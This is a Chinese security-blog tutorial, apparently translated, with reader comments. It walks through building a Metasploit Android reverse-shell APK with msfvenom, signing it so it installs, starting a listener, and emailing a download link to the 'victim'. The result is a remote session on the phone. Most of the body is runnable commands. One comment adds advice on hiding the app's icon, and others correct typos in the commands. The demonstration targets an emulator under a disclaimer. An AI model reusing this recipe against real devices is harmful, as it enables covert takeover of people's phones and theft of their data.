技术分享:如何使用Metasploit对安卓手机进行控制

2016-05-16 +7 1217254人围观 ,发现 27 个不明物体 终端安全

Download-Best-Android-Hacking-Tools-2015.jpg

文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

图片1.png 

 

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

247942_screenshot_1.png

Msfvenommsfpayloadmsfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk

```

设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

图片2.png 

 

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK

我们可以使用如下工具进行手动签名:

Keytool (已安装)

jar signer (已安装)

zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`图片3.png 

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname` 

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`图片5.png 

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

图片6.png 

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

图片7.png 

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

图片8.png 

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

图片9.png 


图片10.png

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

图片11.png 

 

这是我们切换到安卓模拟器。

1、https://code.google.com/archive/p/android-x86/downloads下载android x86iso

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像,启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

图片12.png 

另外要允许安卓安装来历不明的apk

图片13.png图片14.png 

切换回Kali,我们发现创建了一个新的会话。

图片15.png 

然后你就可以为所欲为的操作这台“手机”了。

图片16.png

*参考来源:resources.infosecinstitute ,FB小编东二门陈冠希编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

相关推荐

这些评论亮了

  • aaa 回复
    两处小错误
    1.
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
    ip少了个点
    2.
    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
    最后应该是alias_name,少了个下划线
    ps.安卓4.4、5.1、6.0的模拟器:
    https://sites.google.com/a/android-x86.org/web/releases/releasenote-4-4-r5

    apk安装完以后有个图标,得想办法隐藏。
    )23( 亮了
  • 请问在Kali中进行签名的时候显示无法打开jar,目前百度的资料上均是在Windows情况下的,并且我也尝试将apk放到java的bin文件夹中,可是依旧是显示无法打开jar文件。请问您是如何解决这个问题的呢。
    )16( 亮了
  • testscc 回复
    然后呢?有没有更高(wei)级(suo)的玩法?
    )15( 亮了
  • 这个tor怎么用 回复
    msf的用法 :mrgreen:
    )12( 亮了
  • 0xroot (6级) 奔跑的蚂蚁 回复
    @ 蔬菜灬蘸酱  使用java -jar 运行jar包
    )11( 亮了
发表评论

已有 27 条评论

取消
Loading...

特别推荐

推荐关注

活动预告

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php